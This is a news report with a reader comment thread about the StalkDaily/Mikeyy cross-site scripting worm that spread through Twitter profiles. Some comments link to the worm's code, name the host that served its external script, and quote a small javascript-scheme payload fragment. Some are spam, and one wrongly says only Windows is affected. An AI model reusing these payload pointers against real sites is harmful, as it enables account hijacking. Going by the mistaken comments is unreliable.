A bad week for Twitter just got even worse. The service has apparently been infected by a worm originating from the owners of the website StalkDaily (Note: Do not visit this website, as it may cause your computer to become infected). At this point details are scant, but it appears that visiting the Twitter profile page of an infected user can lead your profile to become infected as well (some reports say that the worm modifies your ‘About Me’ section to include a link to the worm). Infected users begin to repeatedly spam tweets directing users to the StalkDaily website.
The attack appears to have originated early this morning, when a handful of blog posts popped up detailing the worm. However, it is only now hitting critical mass, with hundreds of related Tweets appearing on Twitter Search in the last few minutes alone. Twitter’s official Spam watching account updated this morning stating that the company was aware of the issue but that it had been mostly resolved, and just issued another update stating that it was aware of the worm’s resurgence this afternoon.
To stay on the safe side, it would probably be wise to stick with a third party Twitter client and avoiding viewing profile pages until the company confirms that the issue is resolved.
Some early comments are indicating this is an XSS attack on Twitter. Others note that the attack may have started after one of Twitter’s many third party applications took the login credentials entered by Twitter users and hijacking their accounts.
Update 9 PM PST: Twitter has posted the following update to its status page stating that the issue has been fixed:
Update on StalkDaily.com Worm 36 minutes ago
Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability. We’ve taken steps to remove the offending updates, and to close the holes that allowed this “worm” to spread.No passwords, phone numbers, or other sensitive information were compromised as part of this attack.
Update: Apparently StalkDaily has updated their website to say that it has nothing to do with the attacks. Regardless, do not visit the site for the time being.
For everyone wondering, I did NOT promote and/or was involved with the spamming ON Twitter. All bad things you are hearing about this site is not true. Please reconsider as I am not the person who did this…StalkDaily is a website that follows the same functions as Twitter, except more advanced How? Well, instead of just adding an “update status”, people can add pictures and videos. Then you can stalk them, so when they upload a video or picture, or comment someone, you’ll know!
Glad to hear that Twitter is on top of this. Thanks for the update Jason.
Here is a screenshot of STALKDAILY.COM http://twitpic.com/36mo5
Wow. Cloning the service (as it’s easy to do) is one thing, cloning the layout is just pathetic.
Unfortunately, if I’m understanding the service right, it might just be what I’ve been looking for as a mobile version of Tumblr.
It’s back.
People who have been hacked – do not visit these profiles: http://tinyurl.com/cvujsd (Twitter Search link)
If you’ve been infected, change the URL in your profile, SIGN OUT from the Twitter WebUI, and wait for a fix.
‘Mikeyy’ only has access to your account while you’re signed in to the webui, as it’s cookie based. He doesn’t have your password.
http://twitter.com/BeauGiles
update: apparently stalkdaily.com is not involved in the attacks and its safe to visit the site. only avoid visiting user profiles as the attacking spam has not been cleaned from user profiles yet.
via: http://mashable...kdaily-twitter/
That is a kiss of death for that site as is the name…
17 years old kid claims responsibility for the worm http://adjix.com/b52w via @breakingnews
Really? Did he did this?
http://www.smartbloggerz.com
@typhoon,stop using Shahid Kapur;s pic
hes gonna sue u
☻/
/▌
/ \ Hi. I’m Bob. I’m taking over the internets.
They need to post a message within your Twitter account. A forced Tweet from them when you sign in so you see it!
Who is Michael “Mikeyy” Mooney? a 17yr old from Winnfield, LA: http://sqworl.com/?i=a11951
Known kiddie who has been sent a Cease & Desist by Stickam for attacks, and tries to XSS his own classmates profile
“Twitter on top of this?” Considering the irresponsible manner in which Twitter is administered, these problems this weekend were only a matter of time. And there will be more service interruptions.
I would try http://www.clasilistados.org
Maybe you can find something sexy there ; )
Jennie
wtf you have got to be kidding me
I got hit by it in the last hour. Was rather bizarre as it tweeted 4 tweets from my account directing people to stalkdaily. Luckily I was able to delete the tweets pretty quickly but I still got @replies and unfollows because of the tweets. It did however also change my URL in my bio to stalkdaily.com (Don’t go on it) so I’ve changed my password yet again and cleared my cache. Hopefully that’s seen to it but looks to be the first twitter virus?
Meanwhile, the StalkDaily site is complaining in broken english about being associated with this. Wouldn’t be the internet’s first joe job, but StalkDaily’s site doesn’t appeal to me anyway.
I love how they throw in some advertising.
Yeah maybe they do have something to do with it!
If you were totally innocent why add spam into your disassociation rebuttal?
“visiting the Twitter profile page of an infected user can lead your profile to become infected as well “
That is the disturbing part.
How come such large application is exposed to XSS attack, or is there something I don’t get.
The XSS was in the Web field. This XSS didn’t exist last week. Twitter has been testing some new redesigns of the profile page. The XSS was is the new code.
So within this short time-slot one managed to see the security vulnerability and also hack it.
I’m impressed.
Maybe they deserve to get all those twitter users.
Seems like those guys at stalkdaily.com knows better than twitter how to handle XSS attacks.
So it’s twitter just better (you can add pictures and videos, and we also understand in security)
Shame on Twitter.
Sanitize user input is something they teach you in Security 101. Another demonstration of Twitter not having a clue.
turns out the ‘virus’ is an xss attack on twitter. Kinda unimpressed. Here’s the code:
http://gist.github.com/93782
you can ‘infect’ your account by visiting ANYONE who has been infected on twitter, whilst logged in.
Oh, and your password is safe: they dont get at that.
Interesting find.
Could this be a proof-of-concept hack, by chance? The XSS part of the scam is highly surprising for a site this large.
Just proves that the default security settings for browsers should not allow HTML to be read if its from another domain.
The biggest issue is that this appears to have started entirely from phishing Twitter usernames and passwords under the guise that they were going to use the data for the API as any other developer would normally use it.
I think that Twitter has grown to the point now that it needs a more secure login system like that of Facebook Connect or require OAuth as the only system for API Developers.
I don’t see how visiting StalkDaily.com would pose any threat. I went to view-source:http://www.stalkdaily.com/ and the only scripts I see are a Google Analytics ga.js and a statcounter.com script. Just in case though, I’m still not going directly there.
Welcome to web 2.uhoh
Do people honestly think that all these niche websites that were popping up everyday were being built and designed by people with security in mind? You would be surprised at how many of these sites are running on databases that don’t even encrypt passwords.
They think because it is an HTTPS page they are safe, but they don’t know what protection is being provided once their data gets dumped into some database.
This is only a glimpse into what is to come, sadly to say.
Most people run around the web using the same username/password for almost everything, and sign up for EVERYTHING! The chickens are gonna come home to roost.
This might be a little different in nature, but it should underscore the importance for people to limit what they sign up for, and to use different passwords for everything. It’s hard to keep track of, but it’s necessary.
“You would be surprised at how many of these sites are running on databases that don’t even encrypt passwords.”
humour us, how many ? which ones ? Since you know so much, prove to us you aren’t pulling these out of your ASS. Waiting….
If we’re looking for an optimistic outlook, at least it happened on Twitter, right?
I think we’re about to see one of the quickest clean-up’s in the history of web-maliciousness. At the rate news, information, and education travels on Twitter ~ and yes, even potentially worms, virii, etcetera, etcetera ~ this thing can’t possibly last long.
Twitter, methinks, is about to show itself off as analogous to Firefox in this regard.
Speaking of, I’d like to know what browsers and systems are being infected. I’m sure I know the answer, but verification would be spiffy.
trench: Using FF 3.0.8 here
http://search.t...neff+stalkdaily
With all those millions Twitter still can’t hire somebody that knows how to fashion a regular expression.
http://www.regu...xpressions.info
There Twitter, bookmark that.
s/StalkDaily//gis;
wow, that was super hard.
That’s not even a regular expression. The leading s shouldn’t be there, there shouldn’t be an extra / at the end, there is absolutely NO use for that dotall (s) flag and you don’t need a g flag if you’re just testing to see if a string matches a regexp, and it shouldn’t ever end with ;
/StalkDaily/iElijah
the s was for sed, the bash command that does regular expression matching and replacing
http://mailman....ust/001330.html
You can also lookup the man page on sed.
The g is for global, because we want to globally replace this, not just preform a grep or egrep style search for it.
The s is to concatenate all lines of the searched string as one so we can search through line returns, where you may want to do
s/Stalk[\r\n]Daily//gis;
Remember the infamous Sammy MySpace worm?
That was exploited by a vulnerability in flash were if you did geturl(”java\nscript:alert(’foo’)”)
… the line return in javascript would over rule the flash 8 security for disabling javascript in the flash movie dom object tag.
The i is for case insensitivity, which is pretty obvious.
So no, you are wrong. These flags were not put in by accident, and neither was the 3rd backslash.
For those that don’t know sed is short for stream editor. Where a file is opened as disk I/O and the STREAM of textual or binary data is then FILTERED.
“The g is for global, because we want to globally replace this, not just preform a grep or egrep style search for it.”
Well, grep does spew out EVERY match, so let me rephrase that, we want to use g to replace every instance, not just the first one.
Even if the s was replaced with an m, we would still want the g there.
So if I say “StalkDaily sucks” they would delete (or whatever you think they should do) to the post automatically.
”
The smart decision would be to just compare it with the 6 different possible updates:
“Dude, http://www.StalkDaily.com is awesome. What’s the fuss?”
“Join http://www.StalkDaily.com everyone!”
“Woooo, http://www.StalkDaily.com
“Virus!? What? http://www.StalkDaily.com is legit!”
“Wow…www.StalkDaily.com”
“@twitter http://www.StalkDaily.com“
I visited stalkdaily just now with my javascript turned off. but viewing the source the only js I see is google analytics and statcounter. All i see is a site that’s mimicking twitter’s stylesheet and claiming to be an enhanced version of twitter.
It states on the homepage:
“For everyone wondering, I did NOT promote and/or was involved with the spamming ON Twitter. All bad things you are hearing about this site is not true. Please reconsider as I am not the person who did this.
StalkDaily is a website that follows the same functions as Twitter, except more advanced How? Well, instead of just adding an “update status”, people can add pictures and videos. Then you can stalk them, so when they upload a video or picture, or comment someone, you’ll know!”
That’s clearly BS if you do a quick search on the history of the site,, related sites, nameservers, and owner(s)/users.
As far as I’ve seen it’s specifically the Gangsterboyhah account that’s doing all the infecting.
Ridiculous… is nothing sacred????
How are you supposed to change your password if you are locked out of your account? Did I miss step 1?
They call it “Forgot your password”. It’s magic, so I heard.
brilliant!
Thanks for the post, Mike.
(I think you meant to thank Jason.)
(I think I meant to see Mike’s comma.) #oops
failed blog needs to capture your post
http://pastebin.com/m4e6afa74 in his bio-> mikeyylolz.uuuq dot com/x.js
i got myself infected by visiting profile of someone who was. wtf.
but i kind of feel bad if the owner of the site didn’t do this. what if it was someone trying to bring them down?
i.e. what’s stopping someone from targeting an unsuspecting startup or blog and making it look like they were behind it?
My Guess,
StalkDaily.com claims they are a service like twitter just little better.
They defiantly gonna get the buzz now – and exactly from the same user-base they’re looking for.
Maybe one of their affiliates done that, or maybe they did, or maybe someone did it “for-them” without them even knowing about that – someone who disgust Twitter for example.
Nevertheless, it can’t be coincidence.
So that the only 2 visitors that usually go to stalkdaily don’t go there anymore?
nothing
Wow..
I got infected right after Christine today by clicking her profile, as I couldn’t believe she would post the stalkdaily blurb.
I agree with her that if someone wanted to stop a new startup, this would be the perfect way to get a ton of bad press.
My big question is Why does this hit all the blogs before it makes the status.twitter.com page? Shouldn’t THEY be telling everyone about it, how to avoid it, and what to do if infected? Basically inexcusable IMO
The owner is saying its not him ya right!
Twitter: seanyoughal
Rob: Twitter doesn’t care about you. They only care about celebrities.
Robert, did you get notification?
My guess is that it only affects Windows.
It operates at the JavaScript level, so there is no reason that would be confined to any given OS. IOW, the non-Windows users are not off the hook on this one!
Any word as to whether NoScript successfully block the XSS attempt? (NoScript is a Firefox extension that allows scripts and applets on a per site basis—the way i’ve always said that it should be. It also does its best to block cross-site scripting. Don’t leave localhost without it!)
Did techcrunch block my ability to comment? testing 1,2,3.
weird, my last reply didn’t go through.
Anyhow, as i tried to state before. As the code on the page linked by James Cox shows, this is spreading thru updating user’s profile URL with a script source that updates your visitors’ profile URL as well. it covers up this fact by posting a random tweet to that website and including that website into your profile URL before appending itself.
because we are twitter and they expect the news to spread automatically through the network without them doing anything
Tip: Possibly Use OpenID + hardware token for credentialing + linking profiles. Keep those authentication times *very* short.
Tip: Use the old security adages of “change your passwords routinely; don’t use the same userid/password combination across all sites; make it difficult with 7+ and special chars – uP3R(A$e – kinda looks like the word uppercase, right?
Infections/malware is rampant on popular sites – people & idiots attack what they lack.
none of which would protect against an xss attack vector using ajax to post with an already authenticated user.
Are all web browsers vulnerable or only certain OSes or browsers?
Just windows
sadly you’ve taken the “computer talk” on 24 all too literally. ok, mail me that rsa keyfob so i can sign up for your social network….
Robert: No kidding….They don’t care about anyone. Not even their own asses.
Rob: communication has never been Twitter’s strong suit.
Here is the link to the worm code: http://gist.github.com/93782
Rob Nelson – EXACTLY!!! damn good question!
I guess it was only a matter of time as most things that get popular so quickly do not have time to instigate the proper security measures.
My Facebook got hacked last month and someone was able to ask all my friends for money. Luckily I was contacted by a friend asking why I was in London and yet I was in Brisbane Australia.
I closed it all down with a final post of don’t send me any money.
So be ware and keep good accounts.
Q
twitter don’t care…..
+1 scoble – although I would add "and those who bring them cupcakes and/or fluff them everyday with posts"
I am on a mac and was infected. How do I remove the link to dailystalk on my profile by using a 3rd party app?
Well it would seem that 3 Roberts are in agreement here. You would THINK that a communications oriented company would be better at ….communications…hmm..Frankly it seems that this does not bode well for the long term of twitter. Maybe they should sell it now before they kill it themselves.
Uh… Where are all my past tweets? My Twitter page only has my most recent update, all of the others appear to be gone. Tell me I haven’t lost everything?!
I personaly know mikeyy (the owner of stalkdaily.com) and it was not him who made the worm, we actually have no clue who made it, im second thing to an owner of stalk daily. but i recently made my own site and quit using it.
You might want to have a little chat with your friend then, cause he’s made quite an effort to spread the news that it was him who made the worm:
http://netnewsd...ily.com/?p=1558
:-/
What about how to remove the worm?
I’m hoping Twitter is going to offer an ‘official fix’. If they don’t soon, I’ll post a link to a blog with instructions.
Sounds appropriate.
Keep shooting yourself in the foot Twitter, eventually everyone will realize that your service sucks and that FriendFeed Rocks.
Hmmmm… allot of Friendfeed love going on here (me starts to wonder what THAT is about)
Friendfeed and Tritter, i think, are 2 different services. One can follow everything you are doing socially online (like MyBlogLog of which fell out of favor for some reason here at TechCrunch) with one, while the other is very simple microblogging that doesn’t even allow more than 140 letters: Less than the standard 160 letters that a cell phone text would.
Compare Twitter to Plurk, fine. Twitter to FriendFeed just doesn’t make sence to me. Even Twitter to Facebook would work better than Twitter to Friendfeed.
But anyway… hope they explain all of this BEFORE Monday hits and people really started signing in and tweeting stuff
Mark Hawker did a great job figuring the whole thing out, and posted the details in the comments to my post at http://www.netw...nity/node/40822
Complete page source and so on can also be found at that link.
Admittedly, Twitter’s going to be cursing itself today. It’s also a good day for any Friendfeed people to show off Friendfeed’s best features helping provide people with updates on that worm situation. Helping in a crunch is a good way to show how Friendfeed can be used effectively.
Well, there’s another stupid thing I’ll never have to worry about. 30 years of computer usage and Microsoft operating systems have taught me to never become the early adoptee. I’ll order Texas Toast and eggs for your spam.
ADOPTER
Does this mean might not be able to tweet about going to the store and buying a half gallon of milk???
GOD HELP US ALL!!!!
Wow this is crazy watch my video for more info on this.
http://www.yout...h?v=rFf3JziOHWg
There are additional notes on the worm posted here (sorry for the other blog link but…)
http://www.netw...nity/node/40822
and more code here
http://gist.github.com/93782#
I was on the very breaking edge of this after investigating claims from a follower, and determining that they were correct. It took mashable and TechCrunch about (but less than) an hour to get this story up. Twitter’s spam account responded publicly after that (IIRC)
FURTHERMORE – Twitter continues in its inconsiderate (and potentially disastrous) behavior by not posting incidents to the status.twitter.com page. Several users requested that Twitter post not only the fact that this was happening but suggested corrective measure. As of this writing, Twitter never posted word one to their status page. VERY IRRESPONSIBLE on the part of Twitter. Inexcusable IMO.
Twitter persists in its apparent belief that the outside world will think all is hunky-dorey if they simply don’t post negative status update. This WILL harm Twitter in the end.
But it’s no surprise. Twitter doesn’t really care about its users. A few great people inside twitter (like @a3lx) do care, but that doesn’t help the users to know anything. The users of twitter are left in the dark hunting for answers.
In fact, as I write this, I am still inundated with user questions about what happened, how to know if they are infected, and what to do if they are.
I said it on above, and I’ll say it here:
It was TOTALLY IRRESPONSIBLE of Twitter to leave their users in the dark.
Thank you TechCrunch for being on the breaking edge of this story. Hats of to you and the other Big Blogs (Like Mashable) for exposing this and getting the word out to all the tweeps.
Good Job!
6 minutes after my previous comment, and 13 minutes after a similar comment to Mashable, status.twitter.com was updated.
Since this is running Javascript, am I correct in assuming NoScript in Firefox would block the script, thus preventing the infection? Or am I “living in a Fool’s Paradise?”